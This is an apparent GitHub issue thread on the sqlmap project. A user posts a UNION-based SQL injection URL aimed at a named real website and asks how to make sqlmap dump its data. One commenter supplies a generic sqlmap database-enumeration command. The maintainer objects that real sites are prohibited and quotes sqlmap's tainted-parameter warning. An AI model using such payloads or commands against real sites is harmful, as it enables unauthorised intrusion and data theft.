### ISSUE TITLE
I got injcetible url from sqli dumper but how to use it in sqlmap to dump data??

### ISSUE THREAD

**Issue by suyashwon** [sqlmapproject/sqlmap#2717]
So here is the url=
http://www.aloeveraindia.com/Care_Products.php?id=999999.9' union all select 1,2,99,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and '0'='0

When i put it in sqlmap like
Python sqlmap.py -u http://www.aloeveraindia.com/Care_Products.php?id=999999.9' union all select 1,2,99,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and '0'='0

It give many kind of errors 
So can anybody help me to find ways to dump data from this type of urls from sql map??

**Comment by sepos** [comment]
sqlmap.py -u "www.vulnlink.com/vulnparam.php?id=123" --dbs

23 сент. 2017 г. 10:26 AM пользователь "suyashwon" <notifications@github.com>
написал:

**Comment by stamparm** [comment]
1) You are providing real life sites. This is prohibited here
2) You are getting huge WARNING at start of sqlmap and you are asking why sqlmap can't run (USE valid parameter values always):

```
[XX:XX:XX] [WARNING] it appears that you have provided tainted parameter values ('id=999999.9 union all select 1,2,99,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and 0=0') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N
```
